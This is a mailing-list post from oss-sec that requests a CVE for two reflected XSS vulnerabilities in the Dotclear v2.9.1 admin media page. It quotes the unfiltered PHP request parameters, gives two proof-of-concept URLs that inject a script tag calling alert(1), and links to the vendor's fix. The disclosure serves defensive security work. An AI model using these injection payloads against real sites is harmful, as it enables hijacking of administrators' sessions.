oss-sec mailing list archives
CVE request: XSS vulns in Dotclear v2.9.1
From: 陈瑞琦 <chenruiqi () 360 cn>
Date: Tue, 2 Aug 2016 06:13:03 +0000
I found some XSS vulns in Dotclear v2.9.1 Title: XSS vulns in Dotclear v2.9.1 Author: Chen Ruiqi, Chenruiqi () 360 cn Date: 2016-08-01 Download Site: https://dotclear.org/download Vendor: dotclear.org Vendor Notified: 2016-08-01 Vendor Contact: security () dotclear net -------------------------------------------------------------------------------------------------------- Discription: Dotclear is an open source blog publishing application distributed under the GNU GPLv2. Developed originally by Olivier Meunier from 2002, Dotclear has now attracted a solid team of developers.[2] It is relatively popular in French speaking countries, where it is used by several major blogging platforms (Gandi Blogs,[3] Marine nationale,[4] etc.).(Wiki) ----------------------------------------------------------------------------------------------------------- Vulnerability: There are two reflected XSS vulns in Dotclear v2.9.1 media manager /admin/media.php line 34 $link_type = !empty($_REQUEST['link_type']) ? $_REQUEST['link_type'] : null; line 62 $q = isset($_REQUEST['q']) ? $_REQUEST['q'] : null; Lack of filter before put the user-input into the page. -------------------------------------------------------------------------------------------------------- PoC Code: http://*.*.*.*/dotclear/admin/media.php?q=77777%3C%2Fspan%3E%3Cscript%3Ealert(1)%3C/script%3E&popup=0&select=0&plugin_id=&post_id=&link_type= http://*.*.*.*/dotclear/admin/media.php?q=77777&popup=0&select=0&plugin_id=&post_id=&link_type=8888%22%3E%3Cscript%3Ealert(1)%3C/script%3E ---------------------------------------------------------------------------------------------------------- Fix Code: https://hg.dotclear.org/dotclear/rev/40d0207e520d Could you assign CVE id for those? Thank you Chen Ruiqi Codesafe Team
Current thread:
- CVE request: XSS vulns in Dotclear v2.9.1 陈瑞琦 (Aug 01)
- Re: CVE request: XSS vulns in Dotclear v2.9.1 cve-assign (Aug 02)